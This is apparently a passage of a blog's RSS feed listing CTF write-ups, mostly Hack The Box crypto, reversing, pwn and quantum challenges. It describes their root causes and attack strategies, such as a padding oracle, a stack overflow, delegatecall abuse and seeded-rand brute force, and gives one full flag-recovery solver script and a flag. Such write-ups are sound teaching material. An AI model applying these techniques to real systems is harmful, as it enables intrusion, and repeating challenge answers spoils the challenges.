/tags/ctf/ Recent content in Ctf on Zero's Blog Hugo en-us Wed, 11 Mar 2026 22:12:00 +0700 /posts/htb-crypto-raining-primes/ Wed, 11 Mar 2026 22:12:00 +0700 /posts/htb-crypto-raining-primes/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Raining Primes</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Hard</li> <li><strong>Goal:</strong> Recover the flag from an RSA-wrapped AES ciphertext.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service uses one hidden 640-bit prime <code>r</code> in multiple places:</p> <ul> <li>Prime oracle outputs <code>x = a*r + b</code> where: <ul> <li><code>a</code> is 384-bit random</li> <li><code>b</code> is 256-bit random</li> </ul> </li> <li>RSA primes are generated with the same form: <ul> <li><code>p = a*r + b</code>, <code>q = c*r + d</code></li> </ul> </li> <li>Key update transforms each AES key bit via: <ul> <li><code>bit' = ((k0 * k1) mod r) mod 2</code></li> </ul> </li> </ul> <p>This creates two exploitable links:</p> /posts/htb-rev-maze/ Thu, 05 Mar 2026 16:10:00 +0700 /posts/htb-rev-maze/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Maze</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Recover the final valid input from multi-stage checker logic.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p><code>maze.exe</code> is a PyInstaller-packed Python application that gates progress behind hidden constants and staged payloads.</p> <p>Reversing the Python entrypoint reveals:</p> <ul> <li>route gate string: <code>Y0u_St1ll_1N_4_M4z3</code></li> <li>ZIP password for <code>enc_maze.zip</code>: <code>Y0u_Ar3_W4lkiNG_t0_Y0uR_D34TH</code></li> </ul> <p>After unpacking, deeper stages eventually resolve to an ELF checker whose validation is purely arithmetic and reversible.</p> /posts/htb-rev-hexecution/ Thu, 05 Mar 2026 15:58:00 +0700 /posts/htb-rev-hexecution/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Hexecution</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Hard</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Recover the expected input for the custom VM program and derive the final flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The binary <code>cook</code> is a small interpreter for the DSL file <code>recipe.asm</code>. Instead of checking input directly, it transforms user input via a deterministic two-stage permutation pipeline and compares against a fixed 32-byte target table loaded by VM instructions.</p> /posts/htb-rev-vvm/ Thu, 05 Mar 2026 15:35:00 +0700 /posts/htb-rev-vvm/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> vvm</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Hard</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Recover the password accepted by the embedded custom VM.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The binary does not compare the input directly. Instead, it runs a custom VM program that:</p> <ol> <li>enforces input length = <code>32</code>,</li> <li>rearranges selected bytes into 8 little-endian 32-bit words,</li> <li>applies <code>rol32</code> transforms,</li> <li>compares against hardcoded constants.</li> </ol> <p>So the intended path is reverse-engineering VM semantics, then algebraically inverting the transformations.</p> /posts/eh4x-ctf-2026-writeup/ Wed, 04 Mar 2026 14:00:00 +0700 /posts/eh4x-ctf-2026-writeup/ <h2 id="overview">Overview</h2> <p>This post collects the solved EH4X CTF 2026 challenges and the practical exploitation approach used for each.</p> <h2 id="table-of-contents">Table of Contents</h2> <ul> <li><a href="#heist-v1-blockchain">Heist V1 (Blockchain)</a></li> <li><a href="#i-guess-bro-reverse">i-guess-bro (Reverse)</a></li> <li><a href="#womp-womp-pwn">Womp Womp (Pwn)</a></li> <li><a href="#lulocator-pwn">Lulocator (Pwn)</a></li> <li><a href="#sarcasm--sarcasm-pwn">SarcAsm / Sarcasm (Pwn)</a></li> <li><a href="#inferno-sprint-misc">Inferno Sprint (Misc)</a></li> <li><a href="#chusembly-misc">Chusembly (Misc)</a></li> <li><a href="#final-notes">Final Notes</a></li> </ul> <hr> <h2 id="heist-v1-blockchain">Heist V1 (Blockchain)</h2> <h3 id="tldr">TL;DR</h3> <p>The vault trusted governance too much. By setting governance to an attacker contract and abusing delegatecall execution, storage got overwritten (<code>admin</code>/<code>paused</code>), then funds could be withdrawn.</p> /posts/htb-quantum-phase-madness/ Wed, 04 Mar 2026 10:55:00 +0700 /posts/htb-quantum-phase-madness/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Phase Madness</li> <li><strong>Category:</strong> Quantum</li> <li><strong>Difficulty:</strong> Medium-Hard</li> <li><strong>Goal:</strong> Recover all encoded bytes from qubit phase rotations.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Each flag byte is encoded directly as a rotation angle in degrees.</p> <p>From source:</p> <ul> <li>index <code>% 3 == 0</code>: <code>RX(byte)</code></li> <li>index <code>% 3 == 1</code>: <code>RY(byte)</code></li> <li>index <code>% 3 == 2</code>: <code>H</code> then <code>RZ(byte)</code></li> </ul> <p>The service lets us:</p> <ul> <li>choose qubit index,</li> <li>apply extra known rotations (<code>RX/RY/RZ</code>),</li> <li>receive high-shot measurement counts.</li> </ul> <p>That is enough to estimate sin/cos components and recover the original angle (thus byte).</p> /posts/htb-rev-wayback/ Wed, 04 Mar 2026 10:55:00 +0700 /posts/htb-rev-wayback/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Wayback</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Recover generated password and decrypt ciphertext to obtain flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The binary generates a password using <code>rand()</code> seeded from local timestamp fields (year/month/day/hour/min/sec formula), then uses that key material in AES-CBC flow.</p> <p>Given challenge-provided generation window, key recovery becomes bounded brute-force over time.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Reverse password generator logic: <ul> <li>static charset (lower/upper/symbols/digits)</li> <li>seed formula from datetime fields</li> <li><code>rand() % len(charset)</code> per output char</li> </ul> </li> <li>Re-implement generator exactly with libc <code>srand/rand</code> behavior.</li> <li>Iterate each second in the narrowed date range.</li> <li>Build candidate key from generated password and attempt AES-CBC decrypt.</li> <li>Stop when plaintext contains <code>HTB{...}</code>.</li> </ol> <p>Recovered:</p> /posts/htb-quantum-flagportation/ Wed, 04 Mar 2026 10:50:00 +0700 /posts/htb-quantum-flagportation/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Flagportation</li> <li><strong>Category:</strong> Quantum</li> <li><strong>Difficulty:</strong> Easy-Medium</li> <li><strong>Goal:</strong> Decode all teleported 2-bit symbols and recover the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The challenge is a teleportation protocol correctness trap. The server reveals:</p> <ul> <li>encoding basis (<code>Z</code> or <code>X</code>),</li> <li>Bell-side measurement bits (<code>qubit 0</code>, <code>qubit 1</code>),</li> <li>then asks user operations before measuring receiver (<code>qubit 2</code>).</li> </ul> <p>If the correction mapping is wrong, decoded bits are wrong.</p> <p>Correct mapping for this implementation:</p> /posts/htb-rev-virtually-mad/ Wed, 04 Mar 2026 10:50:00 +0700 /posts/htb-rev-virtually-mad/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Virtually Mad</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Provide VM bytecode that passes strict opcode-shape and final-state validation.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The checker executes user-provided opcodes in a small custom VM and validates final state exactly:</p> <ul> <li><code>a == 0x200</code></li> <li><code>b == 0xffffffff</code></li> <li><code>c == 0xffffffff</code></li> <li><code>d == 0</code></li> <li><code>flags == 0x10000000</code></li> <li>instruction count = 5</li> </ul> <p>The opcode format and pre-check masks make the intended sequence effectively unique.</p> /posts/htb-quantum-global-hyperlink-zone/ Wed, 04 Mar 2026 10:45:00 +0700 /posts/htb-quantum-global-hyperlink-zone/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Global Hyperlink Zone</li> <li><strong>Category:</strong> Quantum</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Satisfy the hidden hyperlink pattern check and print the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The server checks only a specific relationship between measured bitstreams (<code>shares</code>) and does not constrain users to a trusted circuit template.</p> <p>From source analysis, success requires:</p> <ul> <li><code>shares[0] == shares[1] == shares[3]</code></li> <li><code>shares[2] == shares[4]</code></li> <li><code>shares[2] != shares[0]</code></li> <li>and no share may be all-0 or all-1 bytes.</li> </ul> <p>Because arbitrary gate sequences are allowed, we can construct a circuit that enforces exactly those relations.</p> /posts/htb-rev-rega-town/ Wed, 04 Mar 2026 10:45:00 +0700 /posts/htb-rev-rega-town/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Rega Town</li> <li><strong>Category:</strong> Reversing</li> <li><strong>Difficulty:</strong> Easy-Medium</li> <li><strong>Solved by:</strong> Shinkiro</li> <li><strong>Goal:</strong> Recover the valid passphrase accepted by the binary.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>Validation is split into two deterministic layers:</p> <ol> <li><code>filter_input</code> enforces format and character-class constraints via embedded regex patterns.</li> <li><code>check_input</code> multiplies ASCII values of fixed chunks and compares them to hardcoded constants.</li> </ol> <p>Given both layers, the space collapses to a tiny set of candidates.</p> <h2 id="exploit-strategy">Exploit Strategy</h2> <ol> <li>Extract regex constraints from <code>filter_input</code> to build per-position candidate pools.</li> <li>Extract target products from <code>check_input</code> for each underscore-separated chunk.</li> <li>Brute-force each chunk independently using product matching.</li> <li>Apply final <code>main</code> assertions (<code>input[5] == '0'</code>, <code>input[9] == 'r'</code>).</li> <li>Select intended semantic candidate.</li> </ol> <h2 id="solver-code">Solver Code</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span><span style="color:#75715e">#!/usr/bin/env python3</span> </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> itertools </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> math </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> pathlib </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> string </span></span><span style="display:flex;"><span><span style="color:#f92672">import</span> subprocess </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Product constants used by check_input() for each chunk.</span> </span></span><span style="display:flex;"><span>TARGETS <span style="color:#f92672">=</span> [ </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x7A070</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x5C436</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x6CC60</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x27B5776</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x10F9</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0xD76A0</span>, </span></span><span style="display:flex;"><span> <span style="color:#ae81ff">0x7465A58</span>, </span></span><span style="display:flex;"><span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#75715e"># Character pools inferred from regex constraints in filter_input().</span> </span></span><span style="display:flex;"><span>POOLS <span style="color:#f92672">=</span> [ </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;XYZ&#34;</span>, string<span style="color:#f92672">.</span>digits, string<span style="color:#f92672">.</span>ascii_letters <span style="color:#f92672">+</span> string<span style="color:#f92672">.</span>digits], </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;A&#34;</span>, string<span style="color:#f92672">.</span>ascii_letters <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;_&#34;</span>, string<span style="color:#f92672">.</span>digits], </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;T&#34;</span>, <span style="color:#e6db74">&#34;h7&#34;</span>, string<span style="color:#f92672">.</span>digits], </span></span><span style="display:flex;"><span> [string<span style="color:#f92672">.</span>ascii_uppercase, string<span style="color:#f92672">.</span>digits, <span style="color:#e6db74">&#34;n&#34;</span>, <span style="color:#e6db74">&#34;abcdefgh&#34;</span>], </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;O&#34;</span>, string<span style="color:#f92672">.</span>digits], </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;T&#34;</span>, string<span style="color:#f92672">.</span>ascii_letters, <span style="color:#e6db74">&#34;e&#34;</span>], </span></span><span style="display:flex;"><span> [<span style="color:#e6db74">&#34;T&#34;</span>, <span style="color:#e6db74">&#34;nopqrstuvwx&#34;</span>, <span style="color:#e6db74">&#34;nopqrstuvwx&#34;</span>, <span style="color:#e6db74">&#34;nc|&#34;</span>], </span></span><span style="display:flex;"><span>] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">ascii_product</span>(s: str) <span style="color:#f92672">-&gt;</span> int: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> math<span style="color:#f92672">.</span>prod(ord(c) <span style="color:#66d9ef">for</span> c <span style="color:#f92672">in</span> s) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">solve_chunk</span>(charsets, target): </span></span><span style="display:flex;"><span> out <span style="color:#f92672">=</span> [] </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> tup <span style="color:#f92672">in</span> itertools<span style="color:#f92672">.</span>product(<span style="color:#f92672">*</span>charsets): </span></span><span style="display:flex;"><span> s <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;&#34;</span><span style="color:#f92672">.</span>join(tup) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> ascii_product(s) <span style="color:#f92672">==</span> target: </span></span><span style="display:flex;"><span> out<span style="color:#f92672">.</span>append(s) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> out </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">maybe_check_binary</span>(flag: str) <span style="color:#f92672">-&gt;</span> bool <span style="color:#f92672">|</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> bin_path <span style="color:#f92672">=</span> pathlib<span style="color:#f92672">.</span>Path(__file__)<span style="color:#f92672">.</span>with_name(<span style="color:#e6db74">&#34;rega_town&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> <span style="color:#f92672">not</span> bin_path<span style="color:#f92672">.</span>exists(): </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#66d9ef">None</span> </span></span><span style="display:flex;"><span> p <span style="color:#f92672">=</span> subprocess<span style="color:#f92672">.</span>run( </span></span><span style="display:flex;"><span> [str(bin_path)], </span></span><span style="display:flex;"><span> input<span style="color:#f92672">=</span>flag <span style="color:#f92672">+</span> <span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">&#34;</span>, </span></span><span style="display:flex;"><span> text<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, </span></span><span style="display:flex;"><span> capture_output<span style="color:#f92672">=</span><span style="color:#66d9ef">True</span>, </span></span><span style="display:flex;"><span> check<span style="color:#f92672">=</span><span style="color:#66d9ef">False</span>, </span></span><span style="display:flex;"><span> ) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">return</span> <span style="color:#e6db74">&#34;Correct one of us!!&#34;</span> <span style="color:#f92672">in</span> p<span style="color:#f92672">.</span>stdout </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">def</span> <span style="color:#a6e22e">main</span>(): </span></span><span style="display:flex;"><span> chunk_candidates <span style="color:#f92672">=</span> [solve_chunk(cs, t) <span style="color:#66d9ef">for</span> cs, t <span style="color:#f92672">in</span> zip(POOLS, TARGETS)] </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#34;[+] Chunk candidates:&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> i, cands <span style="color:#f92672">in</span> enumerate(chunk_candidates, <span style="color:#ae81ff">1</span>): </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34; chunk</span><span style="color:#e6db74">{</span>i<span style="color:#e6db74">}</span><span style="color:#e6db74">: </span><span style="color:#e6db74">{</span>cands<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> all_flags <span style="color:#f92672">=</span> [] </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> parts <span style="color:#f92672">in</span> itertools<span style="color:#f92672">.</span>product(<span style="color:#f92672">*</span>chunk_candidates): </span></span><span style="display:flex;"><span> flag <span style="color:#f92672">=</span> <span style="color:#e6db74">f</span><span style="color:#e6db74">&#34;HTB</span><span style="color:#ae81ff">{{</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">0</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">1</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">2</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">3</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">4</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">5</span>]<span style="color:#e6db74">}</span><span style="color:#e6db74">_</span><span style="color:#e6db74">{</span>parts[<span style="color:#ae81ff">6</span>]<span style="color:#e6db74">}</span><span style="color:#ae81ff">}}</span><span style="color:#e6db74">&#34;</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> flag[<span style="color:#ae81ff">5</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;0&#34;</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span> </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> flag[<span style="color:#ae81ff">9</span>] <span style="color:#f92672">!=</span> <span style="color:#e6db74">&#34;r&#34;</span>: </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">continue</span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> all_flags<span style="color:#f92672">.</span>append(flag) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[+] Valid candidates after assertions:&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">for</span> f <span style="color:#f92672">in</span> all_flags: </span></span><span style="display:flex;"><span> status <span style="color:#f92672">=</span> maybe_check_binary(f) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">if</span> status <span style="color:#f92672">is</span> <span style="color:#66d9ef">None</span>: </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34; </span><span style="color:#e6db74">{</span>f<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> <span style="color:#66d9ef">else</span>: </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34; </span><span style="color:#e6db74">{</span>f<span style="color:#e6db74">}</span><span style="color:#e6db74"> (binary check: </span><span style="color:#e6db74">{</span>status<span style="color:#e6db74">}</span><span style="color:#e6db74">)&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> intended <span style="color:#f92672">=</span> next((f <span style="color:#66d9ef">for</span> f <span style="color:#f92672">in</span> all_flags <span style="color:#66d9ef">if</span> f<span style="color:#f92672">.</span>endswith(<span style="color:#e6db74">&#34;Town}&#34;</span>)), all_flags[<span style="color:#ae81ff">0</span>]) </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">&#34;</span><span style="color:#ae81ff">\n</span><span style="color:#e6db74">[+] Intended flag:&#34;</span>) </span></span><span style="display:flex;"><span> print(<span style="color:#e6db74">f</span><span style="color:#e6db74">&#34; </span><span style="color:#e6db74">{</span>intended<span style="color:#e6db74">}</span><span style="color:#e6db74">&#34;</span>) </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span> </span></span><span style="display:flex;"><span><span style="color:#66d9ef">if</span> __name__ <span style="color:#f92672">==</span> <span style="color:#e6db74">&#34;__main__&#34;</span>: </span></span><span style="display:flex;"><span> main() </span></span></code></pre></div><h2 id="flag">Flag</h2> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>HTB{Y0u_Ar3_Th3_K1ng_O7_The_Town} </span></span></code></pre></div></pagevault> /posts/htb-pwn-arms-roped/ Tue, 03 Mar 2026 15:20:00 +0700 /posts/htb-pwn-arms-roped/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Arms roped</li> <li><strong>Category:</strong> Pwn</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Get code execution and read the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="binary-recon">Binary Recon</h2> <p>Initial triage (<code>file</code>, <code>checksec</code>, <code>readelf</code>) showed:</p> <ul> <li>32-bit ARM ELF</li> <li>PIE enabled</li> <li>Stack canary enabled</li> <li>NX enabled</li> <li>Partial RELRO</li> <li>Bundled <code>libc.so.6</code></li> </ul> <p>Main vulnerable path is in <code>string_storer()</code>:</p> <ul> <li>reads with <code>scanf(&quot;%m[^\n]%n&quot;, &amp;tmp, &amp;n)</code></li> <li>copies with <code>memcpy(localbuf, tmp, n)</code></li> <li>prints with <code>puts(localbuf)</code></li> </ul> <p>The bug is straightforward: <strong>attacker-controlled <code>n</code> is copied into a fixed stack buffer</strong>.</p> /posts/htb-crypto-neon-core/ Sat, 28 Feb 2026 16:25:00 +0700 /posts/htb-crypto-neon-core/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Neon Core</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the hidden configuration blueprint (flag) from the encrypted output.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service encrypts each 16-byte block as a 4x4 matrix over <strong>GF(257)</strong> using:</p> <p>$$ C = K \cdot S(M) \cdot L + T, \quad S(x)=x^3 $$</p> <p>where <code>K</code>, <code>L</code>, and <code>T</code> are fixed per service instance.</p> <p>Although this looks nonlinear, the nonlinearity is only the per-element cube. After lifting each input byte to $u_i = m_i^3$, the full block transform is affine linear:</p> /posts/htb-crypto-shambles/ Sat, 28 Feb 2026 14:55:00 +0700 /posts/htb-crypto-shambles/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Shambles</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Trigger the withdraw condition that drops target balance to zero and get the flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service decrypts user-supplied token ciphertext with AES-CBC and runs PKCS#7 unpad before JWT verification.</p> <p>Error behavior leaks padding validity:</p> <ul> <li>Invalid padding → <code>Decryption error!</code></li> <li>Valid padding but bad JWT/signature → different response (<code>Validation error!</code> path)</li> </ul> <p>That creates a classic <strong>CBC padding oracle</strong>.</p> /posts/htb-crypto-popo/ Fri, 27 Feb 2026 17:15:00 +0700 /posts/htb-crypto-popo/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> POPO</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the secret plaintext from a flawed Paillier-based service.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service is Paillier-like with:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>g = n + 1 </span></span><span style="display:flex;"><span>c = g^m * r^n mod n^2 </span></span></code></pre></div><p>but it adds an &ldquo;optimization&rdquo; switch:</p> <ul> <li>first positive non-secret message computes normally</li> <li>later positive non-secret messages use <code>local = m</code> (skipping <code>g^m</code>)</li> </ul> <p>Also, a fixed <code>r</code> is reused unless explicitly supplied.</p> /posts/htb-crypto-remeeting-the-wheel/ Fri, 27 Feb 2026 17:10:00 +0700 /posts/htb-crypto-remeeting-the-wheel/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> ReMeeting the Wheel</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the AES key from RSA data and decrypt the final secret.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The AES key is not random 128/256-bit material. Instead, it is constructed as:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>key1 <span style="color:#f92672">=</span> randint(<span style="color:#ae81ff">2</span><span style="color:#f92672">^</span><span style="color:#ae81ff">20</span>, <span style="color:#ae81ff">2</span><span style="color:#f92672">^</span><span style="color:#ae81ff">21</span>) </span></span><span style="display:flex;"><span>key2 <span style="color:#f92672">=</span> randint(<span style="color:#ae81ff">2</span><span style="color:#f92672">^</span><span style="color:#ae81ff">20</span>, <span style="color:#ae81ff">2</span><span style="color:#f92672">^</span><span style="color:#ae81ff">21</span>) </span></span><span style="display:flex;"><span>k <span style="color:#f92672">=</span> key1 <span style="color:#f92672">*</span> key2 </span></span></code></pre></div><p>So <code>k</code> is only about 40–42 bits. The challenge publishes:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>c = k^e mod n </span></span></code></pre></div><p>with standard RSA parameters. This structure enables a meet-in-the-middle recovery.</p> /posts/htb-crypto-aliens/ Fri, 27 Feb 2026 17:05:00 +0700 /posts/htb-crypto-aliens/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> AliEnS</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the hidden flag from a custom AES-ECB oracle.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The service builds plaintext as:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-text" data-lang="text"><span style="display:flex;"><span>aaes.pad(user_input) || aaes.pad(FLAG) </span></span></code></pre></div><p>where:</p> <div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-python" data-lang="python"><span style="display:flex;"><span>aaes<span style="color:#f92672">.</span>pad(x) <span style="color:#f92672">=</span> x <span style="color:#f92672">+</span> P[:(<span style="color:#f92672">-</span>len(x) <span style="color:#f92672">%</span> <span style="color:#ae81ff">16</span>)] <span style="color:#f92672">+</span> P </span></span><span style="display:flex;"><span>P <span style="color:#f92672">=</span> <span style="color:#e6db74">&#34;CryptoHackTheBox&#34;</span> <span style="color:#75715e"># 16 bytes</span> </span></span></code></pre></div><p>Then it encrypts with <strong>AES-ECB</strong> and a <strong>fresh random key per query</strong>.</p> <p>A fresh key blocks classic cross-query byte-at-a-time attacks. But ECB still leaks equality <strong>within the same response</strong>: equal plaintext blocks produce equal ciphertext blocks under that query key.</p> /posts/htb-crypto-twisted-entanglement/ Fri, 27 Feb 2026 13:15:00 +0700 /posts/htb-crypto-twisted-entanglement/ <h2 id="challenge-summary">Challenge Summary</h2> <ul> <li><strong>Name:</strong> Twisted Entanglement</li> <li><strong>Category:</strong> Crypto</li> <li><strong>Difficulty:</strong> Medium</li> <li><strong>Goal:</strong> Recover the server private key and decrypt the encrypted flag.</li> </ul> <pagevault hint="Ask bz for access"> <h2 id="root-cause">Root Cause</h2> <p>The 